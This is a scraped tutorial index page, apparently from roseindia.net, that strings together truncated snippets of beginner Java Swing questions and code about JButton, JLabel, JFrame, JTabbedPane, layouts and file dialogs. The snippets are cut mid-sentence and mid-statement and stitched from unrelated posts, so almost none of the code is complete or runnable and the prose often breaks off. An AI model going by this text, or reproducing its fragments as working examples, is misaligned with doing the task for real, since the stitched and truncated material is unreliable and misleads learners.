responded. Example Here I am going to give a simple example which will demonstrate you about how to bind Enter key on JButton Java Swing Tutorials the Label of a JButton Component(JButton Example) This section illustrates you how to change the label of a button in java swing... in Java Swing Applications. Adding an Icon to a JButton 3D JButton in java? 3D JButton in java? how we can create 3D button in java. thanks Sum of a Number using Swing . JTextField, JButton is a component of GUI. Brief description of the Component...;JTextField(20); 3. JButton with a String as a label, and then drop... Sum of a Number using Swing   Component gui - Java Beginners Component gui Can you give me an example of Dialog in java Graphical user interface? Hi friend, import javax.swing.*; public...:// Thanks Java swing - Java Beginners = 1000; int i; JLabel label; JProgressBar pb; Timer timer; JButton button...Java swing Hi, I want to copy the file from one directory... will be displayed in the page and progress bar also. Example, I have 10 files Create a JComboBox Component in Java Component of swing in java. The JComboBox is used to display drop-down list... Create a JComboBox Component in Java  ... to create a combo box in swing using it's constructor. itemStateChanged Making a component drag gable in java Making a Component Draggable in Java  ... component to another. This program shows a text box and a label on the frame. When you... to transfer the transferable swing component from on the another. Both components should jbutton - Java Beginners jbutton Hi, I have jlist and jbutton options.If i select... are displyed in the jlist using jbutton(refresh button). I want to know how to refresh... listModel; JList list ; public JListExample() { super(Select); JButton Changing Look and Feel of Swing Application Changing Look and Feel of Swing Application  ... and feel for your Swing Application. The look and feel feature of Java Swing provides more interactivity of the frame for user application. Swing allows How to add icons on a button or any component in java - Java Beginners How to add icons on a button or any component in java How to add icons on a button or any component in java? Hi, import...); } } ------------------------------------------ Visit for more information. java swing - Swing AWT java swing how to save data in sql 2005 while insert... { JButton insertButton; JTextField text1,text2; JLabel label1,label2,label; JPanel panel; public InsertData(){ insertButton = new JButton("Save Java Swing Write an applet program to transfer the content of the text field into the listbox component on clicking a button code project  ...++"); model.addElement("Java"); model.addElement("Perl"); model.addElement Java swing Java swing Does Swing contains any heavy weight component Java component Java component What is the preferred size of a component Java swing - Java Beginners Java swing I created a text box and a button. When clicking a button...(); } public SwingProgram(){ JLabel label=new JLabel("Enter Name:"); final JTextField text=new JTextField(15); JButton button=new JButton("Submit"); JFrame What is Java Swing? What is Java Swing? Here, you will know about the Java swing. The Java Swing provides... and GUIs components. All Java Swing classes imports form the How to set Marathi font to Label?? How to set Marathi font to Label?? Hello, I am doing one project in java-Swing Farm Management i want to set Marathi label in that so how i can? plzzzz help me its urgent Changing pictures - Java Beginners Changing pictures I found some html code that allows pictures to be changed on a web page. I copied the code and saved it as an html file. when I... Explorer that have pictures changing on them and they do not get blocked?  java swing - Java Beginners java swing How to upload the image in using java swings. ex- we...; JButton addButton, removeButton, uploadButton; public Uploader() { setSize... JButton(uploadAction); uploadLabel.add(uploadButton); addButton = new JButton Java swing Java swing What methods are used to get and set the text label displayed by a Button object Customize the Icon in a JCheckBox Component of Java Swing Customize the Icon in a JCheckBox Component of Java Swing... box component of swing. The icon is passed to the setIcon() method... to customize the icon in a check box component. That means any icon can be shown where how to move label in jframe in java? how to move label in jframe in java? please any one can give me code for moving a java label in Jframe java swing. java swing. Hi How SetBounds is used in java programs.The values in the setBounds refer to what? ie for example setBounds(30,30,30,30) and in that the four 30's refer to what Creating Check Box in Java Swing component in Java Swing. In this section, you can learn simply creating the Check Box in Java Swing. Check Boxes are created in swing by creating the instance... Creating Check Box in Java Swing   Java Swing Java Swing i have a Label more than that of a frame .... how to extend the frame to view the label which are hidden.. please send me the answer sir/madam Java Swing Java Swing i have a Label more than that of a frame .... how to extend the frame to view the label which are hidden.. please send me the coding sir/madam Java Swing : JFrame Example Java Swing : JFrame Example In this section, you will learn how to create a frame in java swing. JFrame : JFrame class is defined in javax.swing.JFrame..... remove(Component comp) : This method removes the given component from your Create a JRadioButton Component in Java Create a JRadioButton Component in Java  ... button in java swing. Radio Button is like check box. Differences between check... it once. Here, you will see the JRadioButton component creation procedure in java java swing - Swing AWT java swing how i can insert in JFrame in swing? Hi Friend, Try the following code: import java.awt.*; import javax.swing.*; import java.awt.event.*; class FormDemo extends JFrame { JButton ADD; JPanel Creating a JTabbedPane Container in Java Swing to create the JTabbedPane container in Java Swing. The example for illustration... of swing to implement the JTabbed component of Java. The following figure shows the JTabbedPane component of Java Swing: These are explained as follows color changing - Java Beginners color changing sir how to change the color of the selected tab in java swing Hi Friend, Try the following code: import javax.swing.*; import java.awt.*; import javax.swing.event.*; import java.awt.event. Java swing Java swing how to create simple addition program using java swing? import java.awt.*; import javax.swing.*; import java.awt.event.... JTextField(20); JButton b=new JButton("Find"); b.addActionListener(new Java Swing DatePicker Java Swing DatePicker In this section, you will learn how to display date picker using java swing. The date picker lets the user select the Date through..., a multiple month calendar and a month component. You can select any date from java swing java swing iam using my project text box, label , combobox and that the same time i want menubar and popmenu. plz give me code for this. i want immediately plz send me that code changing Background Color changing Background Color  ...; In this example, we are creating a chunk then we use setBackground(Color... of the program is given below:Download this example.  java swing - Swing AWT : Thanks...java swing how to add image in JPanel in Swing? Hi Friend, Try the following code: import java.awt.*; import java.awt.image. Validation in swing - Java Beginners Validation in swing I want to validate my swing program. If I didnt...(); } public SwingProgram(){ JLabel label=new JLabel("Enter Name:"); final JTextField text=new JTextField(15); JButton button=new JButton("Submit SpringLayout in Java Swing Java Swing SpringLayout Example In this section, you will learn how to set component's layout using SpringLayout. It is a very flexible layout manager... the vertical or horizontal distance between two component edges. The edges can Java swing Java swing when i enter the time into the textbox and activities into the textarea the datas saved into the database.the java swing code...(area); JButton b=new JButton("Insert"); lab1.setBounds(10,10,100,20 Changing the Cursor in Java Changing the Cursor in Java  ... cursor in java. Changing the cursor means showing cursor in many different ... in the Component class. It changes the cursor icon when the cursor goes upon JAVA SWING JTabbedPane - Java Beginners JAVA SWING JTabbedPane Hi all, I would like to ask a question..., panel3, "Still something else"); Component panel4 = makeTextPanel("Java..."); JTabbedPane tabbedPane = new JTabbedPane(); Component panel1 Java swing code - Java Beginners in Swing. We have a huge amount of good examples on JTable here. I hope this would be helpful to you...Java swing code How to set a font for a particular cell in JTable java swing java swing what is code for diplay on java swing internal frame form MYSQL DB pls send Here is a code of creating form... "); JButton ADD=new JButton("Submit"); JPanel panel=new JPanel(new GridLayout java - Swing AWT information, Thanks...(new FlowLayout(FlowLayout.LEFT)); Label label1 = new Label("TextField1: "); final TextField text1 = new TextField(15); Label Java swing Java swing how to create the login form? 1... java.awt.event.*; class LoginDemo extends JFrame { JButton SUBMIT; JLabel...(); label2.setText("Password:"); text2 = new JPasswordField(15); SUBMIT=new JButton Java Swing have names beginning with the letter J, for example, JLabel, JButton. Read more at: http:/... Java Swing Swing Progress Bar in Java Swing Progress Bar in Java Swing  ... in java swing. This section shows you how the progress bar starts and stops with the timer. Through the given example you can understand how the progress Java Code - Swing AWT Java Code How to Display a Save Dialog Box using JFileChooser...*; import javax.imageio.ImageIO; public class SaveImage extends Component { int index; BufferedImage bi, bufferImage; int w, h; static JButton button Java - Swing AWT Java I have write a program to capture images from camera... javax.imageio.ImageIO; public class SaveImage extends Component { int index; BufferedImage bi, bufferImage; int w, h; static JButton button; public Java component class Java component class Which method of the Component class is used to set the position and size of a component Java swing - Java Beginners Java swing how to set the background picture for a panel in java swing .i m using Netbeans IDE. Hi Friend, Try the following code...); JTextField text2=new JTextField(10); JLabel lab=new JLabel(""); JButton b1 Need Help with Java-SWING progrmming - Swing AWT :// Thanks...Need Help with Java-SWING progrmming Hi sir, I am a beginner in java-swing programming. I want to know how we can use the print option How to Open Text or Word File on JButton Click in Java - Java Beginners How to Open Text or Word File on JButton Click in Java How to Open Text or Word File on JButton Click in Java SWING SWING A JAVA CODE OF MOVING TRAIN IN SWING Changing JLabel with a jcombobox - Java Beginners Changing JLabel with a jcombobox Hi, I have a JLabel which should change when i select an item from JCombobox.I have some calculations after i get a value from the combo,the result of which i have to display using a JLabel I Java Swing Drag drop - Swing AWT Java Swing Drag drop Hi i have following code that can help to drag...(supportedFlavors[0]); Component component = ((DragSourceContext...) target).getComponent(); container.add(component Swing Button Example Swing Button Example Hi, How to create an example of Swing button in Java? Thanks Hi, Check the example at How to Create Button on Frame?. Thanks Java Program - Swing AWT Java Program Write a Program that display JFileChooser that open... DefaultListModel model; public File currentDir; public DropTarget target; JButton...(); uploadLabel.setLayout(new FlowLayout(FlowLayout.LEFT,5,10)); uploadButton = new JButton Creating a JTable Component a JTable component, you need a java swing frame. The JTable based on the frame's... of JTable and it's components. JTable: The JTabel component is more flexible Java Swing component that allows the user to store, show and edit the data Swing Applet Example in java Java - Swing Applet Example in java  ... swing in an applet. In this example, you will see that how resources of swing..., this is swing label which shows the message in first time This is the Swing Java - Swing AWT Java Hi friend,read for more information, Swing - Swing AWT information, visit the following link: Thanks... canvas; JButton setUpButton = new JButton("Page Setup"); JButton java swing - Java Beginners java swing utlility of super.paintComponent(Graphics g) in java? what does it do actually i.e. which class it is extending or method overriding? Please clarify this with example java swing - Java Beginners (){ JFrame f = new JFrame("Frame in Java Swing"); f.getContentPane().setLayout(null...java swing How to set the rang validation on textfield, compare..."); radioGroup.add(Female); JButton button=new JButton("Submit"); text=new JTextField(15. java - Swing AWT java while inserting in data in text field and click the jButton and save the data in sql 2005 Swing - Java Beginners : Hope that it will be helpful for you. Thanks... links: swing swing Write a java swing program to delete a selected record from a table java swing java swing view the book details using swing Java swing Java swing what are the root classes of all classes in swing java swing java swing what is java swing Swing is a principal GUI toolkit for the Java programming language. It is a part of the JFC (Java Foundation Classes), which is an API for providing a graphical user interface for Java swing - Java Beginners Java swing Hi, I want to copy the file from one directory to another directory,the same time i want to get the particular copying filename will be displayed in the page and progress bar also. Example, I have 10 files java - Swing AWT Java Implementing Swing with Servlet How can i implement the swing with servlet in Java? Can anyone give an Example?? Implementing Swing with Servlet Example and source Code Servlet SwingToServlet Java Swing Key Event Java Swing Key Event In this tutorial, you will learn how to perform key event in java swing. Here is an example that change the case of characters... KeyAdapter to perform the keyReleased function over textfield. Example: import Java swing Java swing Write a java swing program to calculate the age from given date of birth java swing java swing add two integer variables and display the sum of them using java swing java swing java swing how to connect database with in grid view in java swing Hi Friend, Please visit the following link: Grid view in java swing Thanks
http://www.roseindia.net/tutorialhelp/comment/88103
CC-MAIN-2014-41
refinedweb
2,721
55.74
We above 3 steps, we have an upper bound d of minimum distance. Now we need to consider the pairs such that one point in pair is from left half and other is from right half. Consider the vertical line passing through first look, it seems to be a O(n^2) step, but it is actually O(n). It can be proved geometrically that for every point in strip, we only need to check at most 7 points after it (note that strip is sorted according to Y coordinate). See this for more analysis. 7) Finally return the minimum of d and distance calculated in above step (step 6) Implementation Following is C/C++ implementation of the above algorithm. // A divide and conquer program in C/C++ to find the smallest distance from a // given set of points. #include <stdio.h> #include <float.h> #include <stdlib.h> #include <math.h> // A structure to represent a Point in 2D plane struct Point { int x, y; }; /* Following two functions are needed for library function qsort(). Refer: */ // Needed to sort array of points according to X coordinate int compareX(const void* a, const void* b) { Point *p1 = (Point *)a, *p2 = (Point *)b; return (p1->x - p2->x); } // Needed to sort array of points according to Y coordinate int compareY(const void* a, const void* b) { Point *p1 = (Point *)a, *p2 = (Point *)b; return (p1->y - p2->y); } // A utility function to find the distance between two points float dist(Point p1, Point p2) { return sqrt( (p1.x - p2.x)*(p1.x - p2.x) + (p1.y - p2.y)*(p1.y - p2.y) ); } // A Brute Force method to return the smallest distance between two points // in P[] of size n float bruteForce(Point P[], int n) { float min = FLT_MAX; for (int i = 0; i < n; ++i) for (int j = i+1; j < n; ++j) if (dist(P[i], P[j]) < min) min = dist(P[i], P[j]); return min; } // A utility function to find minimum of two float values float min(float x, float y) { return (x < y)? x : y; } // A utility function to find the distance beween the closest points of // strip of given size. All points in strip[] are sorted accordint to // y coordinate. They all have an upper bound on minimum distance as d. // Note that this method seems to be a O(n^2) method, but it's a O(n) // method as the inner loop runs at most 6 times float stripClosest(Point strip[], int size, float d) { float min = d; // Initialize the minimum distance as d qsort(strip, size, sizeof(Point), compareY); // Pick all points one by one and try the next points till the difference // between y coordinates is smaller than d. // This is a proven fact that this loop runs at most 6 times for (int i = 0; i < size; ++i) for (int j = i+1; j < size && (strip[j].y - strip[i].y) < min; ++j) if (dist(strip[i],strip[j]) < min) min = dist(strip[i], strip[j]); return min; } // A recursive function to find the smallest distance. The array P contains // all points sorted according to x coordinate float closestUtil(Point P[], int n) { // If there are 2 or 3 points, then use brute force if (n <= 3) return bruteForce(P, n); // Find the middle point int mid = n/2; Point midPoint = P[mid]; // Consider the vertical line passing through the middle point // calculate the smallest distance dl on left of middle point and // dr on right side float dl = closestUtil(P, mid); float dr = closestUtil(P + mid, n-mid); // Find the smaller of two distances float d = min(dl, dr); // Build an array strip[] that contains points close (closer than d) // to the line passing through the middle point Point strip[n]; int j = 0; for (int i = 0; i < n; i++) if (abs(P[i].x - midPoint.x) < d) strip[j] = P[i], j++; // Find the closest points in strip. Return the minimum of d and closest // distance is strip[] return min(d, stripClosest(strip, j, d) ); } // The main functin that finds the smallest distance // This method mainly uses closestUtil() float closest(Point P[], int n) { qsort(P, n, sizeof(Point), compareX); // Use recursive function closestUtil() to find the smallest distance return closestUtil(P, n); } // Driver program to test above functions int main() { Point P[] = {{2, 3}, {12, 30}, {40, 50}, {5, 1}, {12, 10}, {3, 4}}; int n = sizeof(P) / sizeof(P[0]); printf("The smallest distance is %f ", closest(P, n)); return 0; } smallest distance. 3) The code uses quick sort which can be O(n^2) in worst case. To have the upper bound as O(n (Logn)^2), a O(nLogn) sorting algorithm like merge sort or heap sort can be used References:
https://www.geeksforgeeks.org/closest-pair-of-points/
CC-MAIN-2018-09
refinedweb
795
58.35
Hello, I'm having a bit of trouble isolating my scripts from each other in my embedded Python interpreter, so that their global namespaces don't get all entangled. I've had some luck with PyRun_FileEx(), as you can specify dictionaries to use for the globals and locals, but it seems that you can't do the same for PyEval_CallObject() (which i use for calling the callbacks previously registered by scripts run via PyRun_FileEx()). Is there any way to substitute the current global/local dictionaries, run the callback, then switch back to the default? It would be just as good if I could switch between several sets of global variable dictionaries, one for each script; unfortunately, the documentation is less than informative on this point (there isn't even a formal defintion for PyEval_CallObject()). Also, I'm aware that eval() and exec() allow you to pass in global/local dictionaries, but I think it'd be a bit wasteful to drop into Python, run exec(), then have that call my callback, rather than just calling the callback directly from the host program. Thanks in advance
https://mail.python.org/pipermail/python-list/2005-December/325228.html
CC-MAIN-2019-51
refinedweb
185
50.2
In part one, we saw how to create the bare bones of an SMS app. That is to say, we created a utility that could send and receive messages but that wasn’t exactly in a state to replace your current messaging app any time soon. For starters, the app needed to be open in order to receive messages. And you could only message yourself… So yes, we have a ways to go. Let’s sort it out, shall we? And along the way, we’ll learn a number of different skills that can be useful for creating a wide range of different apps! Receiving messages in the background The biggest requirement of any SMS app, is probably that it should be able to alert you about getting new messages. And if you have to have the app open for that to happen, then that kind of defeats the point. Fortunately, we already created a broadcast receiver that can do this and that receiver will be able to hang around and listen out for our messages in the background by default. Problem is, at the moment the broadcast receiver doesn’t actually do anything to alert us to the new messages – it just updates our list. So the first thing we need to do, is to launch MainActivity.java whenever a message is intercepted. To do that, you just need to stick something in the onReceive of the broadcast receiver (which we called SmsBroadcastReceiver). A simple toast message will demonstrate that this works: Toast.makeText(context, "Message Received!", Toast.LENGTH_SHORT).show(); To open the main app and show the messages, we just need to use startActivity. Except we need to add a flag in order to do this from a class other than an activity. Like so: Intent i = new Intent(context, MainActivity.class); i.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK); context.startActivity(i); This tells Android that a new task is being started – meaning that the user will be brought out of what they are currently doing. The problem is that if you use this code as it is, you’ll end up creating multiple instances of your activity, which is pretty bad practice. The easy way to solve this problem is in the manifest, where you just need to add the following line to the main activity: android:launchMode="singleInstance" This will prevent multiple versions of the same activity being created and thus we won’t need to worry about checking whether or not the activity is at the front. Except we kind of do still, just so that we can decide whether to update our inbox (if the activity is already at the front, then startActivity won’t refresh our inbox otherwise). Do this by creating a static boolean called active in your MainActivity.Java and then setting it to ‘true’ onStart and ‘false’ onStop: static boolean active = false; @Override public void onStart() { super.onStart(); active = true; inst = this; } @Override public void onStop() { super.onStop(); active = false; } Finally, you can then use the following code in your broadcast receiver: if (MainActivity.active) { MainActivity inst = MainActivity.instance(); inst.updateInbox(smsMessageStr); } else { Intent i = new Intent(context, MainActivity.class); i.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK); context.startActivity(i); } Now your broadcast receiver will listen out for messages and if the app is running, then it will use the usual updateInbox function to refresh the messages. If the app is not running however, then it will be launched and the inbox will automatically be updated. Finally, we also need to ensure that our broadcaster receiver starts up as soon as the phone boots. This is something we once again do in the Manifest with: <action android: And don’t forget to add the following permission for your app: <uses-permission android: Now, whenever you get an incoming text message, your app will launch and show it to the user; even if they haven’t opened your app recently. As soon as the phone is ready to go, so is your app! This means users will see the message in the inbox and can decide to respond if they so wish. This isn’t really the best practice though, as most people don’t want to be torn away from whatever they’re doing to be forcibly shown your app. Not handy if they’re using Google Maps while they’re driving for instance! Instead then, you might choose to use a transparent activity that only obscures part of the screen (and dismisses itself), you might use a dialog or you might send a push notification. Now that you know how to handle intercepting messages in the background, you can play around with how you want to deal with them. Using broadcast receivers like this is something that will likely come in very handy and you can also use them to set alarms, to listen for other notifications or even to launch apps when the phone is plugged in… Becoming the default SMS app While your app is now receiving your messages automatically, it still isn’t doing its full job as an SMS utility. Right now, whichever SMS app you’ve previously been using will still be doing the same thing and your app won’t be an option when other apps use SMS intents. In other words, you’re not the default app; and as yet, you don’t have the option of being it either. The good news is that all we need to do to change this is ensure we have all the right intent filters in our Manifest file. As many of you will know, an intent is a means of two apps communicating with one another and sending instructions. In Google’s grand vision for Android, the users experience seamless switching between dedicated apps for different services without feeling as though they’re loading separate ‘programs’. Hence the push toward a consistent Material Design that would ensure a similar design language across utilities. We need to ensure our app offers all of the functionality that users might expect from their primary SMS tool Once we add the right intents then, we ensure our app can be chosen as the default messaging service. The only problem is that we also need to ensure our app offers all of the functionality that users might expect from their primary SMS tool. We need to support MMS for example, otherwise the device will be left with no default means of opening multimedia messages. We also need to create a service for quick replies. Hoi! But it’s okay, we can get through this if we stick together… First, we need to create a new broadcaster that we’re going to use to receive MMS messages. Unfortunately, receiving MMS is a whole other thing and so we don’t want to go into that right now. Luckily, what we can do, is to create a kind of ‘place holder’ that will act as a faux MMS receiver in the meantime. Create your new broadcast receiver just like you created the last one and then populate it like so: package com.nqr.smsapp; import android.content.BroadcastReceiver; import android.content.Context; import android.content.Intent; public class MMSBroadcastReceiver extends BroadcastReceiver { public static final String SMS_BUNDLE = "pdus"; @Override public void onReceive(Context context, Intent intent) { throw new UnsupportedOperationException("Coming soon!"); } } What you have here is a broadcast receiver that essentially does nothing… But to be fair, the only people who use MMS these days are our parents (or so I believe). So this will be fine for a lot of people but if you were making a fully fledged SMS app from this, I would recommend coming back and implementing this properly. Likewise, a fully-functional messaging app should also offer the ‘Quick Reply’ option so that users can reject calls with a message or respond to incoming messages without opening the main app. This will require a service to handle that but fortunately, we can just create an empty service again to trick Android. If you were creating a different kind of app, then you might want to use a service to handle calculations or other operations in the background when your app was closed. A service is something that runs silently in the background and doesn’t need to be actively in use by the user. This means we can keep our app open and ready to receive messages, while our user gets on with other things. We can start services from activities, from broadcast receivers and from other services. First though, we need to create one. So make a new class and call it QuickResponseService. Because it is a service that allows us to respond quickly… (although this does sound a little like emergency breakdown cover…) We’re going to add some callback methods seeing as services have their own life cycles – just like activities – and you need these for things to work properly: import android.app.Service; import android.content.Intent; import android.os.IBinder; public class QuickResponseService extends Service { @Override public IBinder onBind(Intent arg0) { return null; } @Override public void onDestroy() { super.onDestroy(); } @Override public int onStartCommand(Intent intent, int flags, int startID) { return super.onStartCommand(intent,flags,startID); } } onCreate and onDestroy should be fairly self explanatory. onStartCommand meanwhile is what we call in order to start our service. Here we pass the intent so that we can pass information to the service. Luckily, we don’t need to worry about all that because we’re not actually going to be using our service. But if you were creating a different kind of app, then you might want to use a service to handle calculations or other operations in the background when your app was closed. Finally, with all these new classes, we’re now ready to update our manifest in order to make it a suitable candidate as ‘default SMS app’. Simply add all the following permissions and intent filters to your Manifest: <?xml version="1.0" encoding="utf-8"?> <manifest xmlns: <uses-permission android: <uses-permission android: <uses-permission android: <uses-permission android: <uses-permission android: <application android: <activity android: <intent-filter> <action android: <category android: > <receiver android: <intent-filter android: <action android: <action android: <action android: <action android: </intent-filter> </receiver> <receiver android: <intent-filter android: <action android: <data android: </intent-filter> </receiver> <service android: <intent-filter> <category android: <action android: <data android: <data android: <data android: <data android: </intent-filter> </service> </application> </manifest> This now tells Android that your app is capable of doing everything an SMS app needs to be able to do and if you’ve done everything right, then you should now see it as an option when you head into settings to change your default messaging app! One more thing you need to do though: disable the relevant features when your app is not the default messaging app. Otherwise, it will continue to pop up whenever someone gets a new message, even when they chose to use another service! You can do this simply by querying Telephony.Sms.getDefaultSmsPackage() to see if yours is currently set to default. Tidying up Now the app almost works like any other SMS app and the parts that are missing should be easy enough for you to figure out. All that’s really left is to tidy things up a little. For example, most SMS apps don’t show all your messages in one screen but rather group them by sender. This is something you can easily do by editing your refreshSMSInbox with the following: do { String str = "SMS From: " + smsInboxCursor.getString(indexAddress) + "\n" + smsInboxCursor.getString(indexBody) + "\n"; if (smsInboxCursor.getString(indexAddress).equals("PHONE NUMBER HERE")) { arrayAdapter.add(str); } } while (smsInboxCursor.moveToNext()); You could simply scan through the messages and use each new sender to generate a list of contacts in a separate activity (creating a new entry only when the sender isn’t already added to the list). From there, show a filtered inbox of only messages from that chosen number in its own thread. It would then be very simple to make the recipient of the message be the person in that thread. And of course you could add a FAB (floating action button) to handle new messages where the number is input manually, probably from the main screen showing the different contacts. Of course most messaging apps also tend to tell you the name of the person messaging you. Using the following function (which relies on ContactsContract), you can easily get the sender’s name rather than just showing their phone number: public static String getContactName(Context context, String phoneNo) { ContentResolver cr = context.getContentResolver(); Uri uri = Uri.withAppendedPath(ContactsContract.PhoneLookup.CONTENT_FILTER_URI, Uri.encode(phoneNo)); Cursor cursor = cr.query(uri, new String[]{ContactsContract.PhoneLookup.DISPLAY_NAME}, null, null, null); if (cursor == null) { return phoneNo; } String Name = phoneNo; if (cursor.moveToFirst()) { Name = cursor.getString(cursor.getColumnIndex(ContactsContract.PhoneLookup.DISPLAY_NAME)); } if (cursor != null && !cursor.isClosed()) { cursor.close(); } return Name; } } Now you can show the name of the sender, rather than just lots of numbers. Be sure to make sure you get permission for READ_CONTACTS though, as this is separate from what we have gotten so far. Note that you can also use this to get the contact’s photo ID this way and thereby display the contact image next to the contact name and number too – which would result in a much nicer looking UI. And this would be especially true if you were to display the messages on cards using RecyclerView , as we have discussed in the past. Closing comments There’s a little work left there for you to do but with that, you should now understand everything necessary to create your own, fully functional SMS app. Get to work on adding those final touches and be sure to share your creations in the comments section. Like I said though, there’s no reason this has to become a typical SMS app just yet and you could always choose to make it into something else, whether that’s an automatically responding AI or an SMS back-up tool. You can find the full source code for this project on GitHub, so get creative!
https://www.androidauthority.com/how-to-create-an-sms-app-part-2-724264/
CC-MAIN-2020-34
refinedweb
2,366
51.38
Blocking, non-blocking, lock-free and wait-free. Each of these terms describes a key characteristic of an algorithm when executed in a concurrent environment. So, reasoning about the runtime behaviour of your program often means putting your algorithm in the right bucket. Therefore, this post is about buckets. An algorithm fall in one of two buckets: blocking or non-blocking. Let's first talk about blocking. Intuitively, is quite clear, what blocking for an algorithm mean. But concurrency is not about intuition, it's about precise terms. The easiest way to define blocking is to define it with the help of non-blocking. There is not any word about locking in this definition. That's right. Non-blocking is a wider term. To block a program is quite easy. The typical use case is to use more than one mutex and lock them in a different sequence. Nice timing and you have a deadlock. But there are a lot more ways to produce blocking behaviour. Each time, you have to wait for a resource, a block is possible. Here are a few examples for synchronising access to a resource: Even the join call of a thread can be used to block a thread. // deadlockWait.cpp #include <iostream> #include <mutex> #include <string> #include <thread> std::mutex coutMutex; int main(){ std::thread t([]{ std::cout << "Still waiting ..." << std::endl; // 2 std::lock_guard<std::mutex> lockGuard(coutMutex); // 3 std::cout << "child: " << std::this_thread::get_id() << std::endl;} ); { std::lock_guard<std::mutex> lockGuard(coutMutex); // 1 std::cout << "creator: " << std::this_thread::get_id() << std::endl; t.join(); // 5 } // 4 } The program run will block immediately. What is happening? The creator thread locks in (1) the mutex. Now, the child thread executes (2). To get the mutex in expression (3), the creator thread has at first unlock it. But the creator thread will only unlock the mutex if the lockGuard (1) goes in (4) out of scope. That will never happen because the child thread has at first to lock the mutex coutMutex. Let's have a look at the non-blocking algorithms. main categories for non-blocking algorithms are lock-free and wait-free. Each wait-free algorithm is lock-free and each lock-free is non-blocking. Non-blocking and lock-free are not the same. There is an additional guarantee, called obstruction-free, which I will ignore in this post because it is not so relevant. Non-blocking algorithms are typically implemented with CAS instructions. CAS stands for compare and swap. CAS is called compare_exchange_strong or compare_exchange_weak in C++. I will in this post only refer to the strong version. For more information, read my previous post The Atomic Boolean. The key idea of both operations is that a call of atomicValue.compare_exchange_strong(expected, desired) obeys the following rules in an atomically fashion. Let's now have a closer look at lock-free versus wait-free. At first, the definition of lock-free and wait-free. Both definitions are quite similar. Therefore, it makes a lot of sense to define them algorithm fetch_mult (1) mutiplies an std::atomic shared by mult. The key observation is that there is a small time window between the reading of the old value T oldValue = shared Load (2) and the comparison with the new value (3). Therefore, another thread can always kick in and change the oldValue. If you reason about such a bad interleaving of threads, you see, that there can be no per-thread progress guarantee. Therefore, the algorithm is lock-free, but not wait-free. Here is the output of the program. While a lock-free algorithm guarantees system-wide progress, a wait-free algorithm guarantees per-thread progress. If you reason about the lock-free algorithm in the last example you will see. A compare_exchange_strong call involves synchronisation. First, you read the old value and then you update the new value if the initial condition already holds. If the initial condition hold, you publish the new value. If not, you do it once more if put the call in a while loop. Therefore compare_exchange_strong behaves like an atomic transaction. The key part of the next program needs no synchronisation. // relaxed.cpp #include <vector> #include <iostream> #include <thread> #include <atomic> std::atomic<int> cnt = {0}; void add(){ // 1 for (int n = 0; n < 1000; ++n) { cnt.fetch_add(1, std::memory_order_relaxed); // 2 } } int main() { std::vector<std::thread> v; for (int n = 0; n < 10; ++n) { v.emplace_back(add); } for (auto& t : v) { t.join(); } std::cout << "Final counter value is " << cnt << '\n'; } Have a closer look at function add (1). There is no synchronisation involved in expression (2). The value 1 is just added to the atomic cnt. And here is the output of the program. We always get 10000. Because 10 threads increment the value 1000 times. For simplicity reason, I ignored a few other guarantees in this post such as starvation-free as a subset of blocking or wait-free bounded as a subset of wait-free. You can read the details on the blog Concurrency Freaks. In the next post, I will write about curiosity. It's the so-called ABA problem which is a kind of false-positive case for CAS instructions. That means although it seems that the old value of a CAS instruction is still the same, it changed in the. We always get 1000. Because 10 threads increment the value 1000 times.should be 10,000 Hunting Today 4036 Yesterday 6041 Week 35892 Month 149782 All 10307544 Currently are 135 guests and no members online Kubik-Rubik Joomla! Extensions Read more... should be 10,000 Thanks, fixed. a blog web site? The account helped me a acceptable deal. I had been tiny bit acquainted of this your broadcast offered bright clear concept
https://www.modernescpp.com/index.php/blocking-and-non-blocking
CC-MAIN-2022-40
refinedweb
964
68.36
Red Hat Bugzilla – Bug 353931 Review Request: xguest - kiosk user setup program Last modified: 2008-09-22 23:30:47 EDT Spec URL: SRPM URL: ttp://people.fedoraproject.org/~dwalsh/xguest/xguest-1.0.2-1.fc8.src.rpm Description: xguest is a package that sets up a locked down user for use in kiosk systems. The user will be controlled so that all they can use is Firefox for reaching the internet. SRPM URL: First off I would like to get this review as fast as possible, to get inclusion in Fedora 8. Maybe I am too late already. The spec file does a couple of things that cause rpmlint to give errors. These are discussed at: This package could be used in conjunction with Fast User Switching to allow users to share the machines with others with little risk, as well as in kiosk environments. good to add license file as %doc whats use of calling "exit 0" at end of each section? Added and removed exit 0's SRPM URL: Maybe I am just picky, but I am very much against creating files in %post. I feel that %source1 sepermit.conf, with the appropriate content, copied in %post to the right place would be cleaner and easier to manage/verify via rpm -qV There are no files being created in post. sepermit.conf is owned by pam and xguest is just appending "xguest" to the file. So what is the state of this? How do we move forward? rpmlint -v ../SRPMS/xguest-1.0.5-2.fc8.src.rpm xguest.src: I: checking rpmlint -v ../RPMS/noarch/xguest-1.0.5-2.fc9.noarch.rpm xguest.noarch: I: checking xguest.noarch: E: use-tmp-in-%post xguest.noarch: E: use-of-home-in-%post These two aren't actually a use of it but adding the namespace configuration to namespace.conf. As soon as pam_namespace will support config files in namespace.d this should be changed. Perhaps you should save a backup of the existing namespace.conf so it will be possible to restore it after the future change. Of course the backup should be owned by the package as %ghost. xguest.noarch: E: preun-without-chkconfig /etc/rc.d/init.d/xguest That's a real error and it should be fixed. chkconfig --del should be run for xguest. xguest.noarch: W: service-default-enabled /etc/rc.d/init.d/xguest xguest.noarch: E: no-status-entry /etc/rc.d/init.d/xguest xguest.noarch: W: no-reload-entry /etc/rc.d/init.d/xguest I think these are OK. Status and reload entries do not make much sense as xguest is not a daemon but script containing just some bind mounts. Whether it should be enabled by default or not is debatable but as the %post script creates the xguest user account I think that enabling the polyinstantiation to work for him without further admins actions (except reboot or start of the script for the first time) is fine. xguest.noarch: W: uncompressed-zip /etc/desktop-profiles/xguest.zip That's OK as it is only 177kB anyway. Comment about the wording of Summary and Description: It should be describing what the package does so IMO it should be more like: Summary: gdm. The home and temporary directories of the user will be polyinstantiated and mounted on tmpfs. More notes: The URL:{name}-%{version}.tar.bz2 points to nonexistent file. There is no %defattr(...) on the beginning of %files. SRPM URL: Has been updated with all your suggested fixes. rpmlint -v ../SRPMS/xguest-1.0.6-1.fc8.src.rpm xguest.src: I: checking rpmlint -v ../RPMS/noarch/xguest-1.0.6-1.fc8.noarch.rpm xguest.noarch: I: checking xguest.noarch: E: use-tmp-in-%post xguest.noarch: E: use-of-home-in-%post xguest.noarch: W: service-default-enabled /etc/rc.d/init.d/xguest xguest.noarch: W: 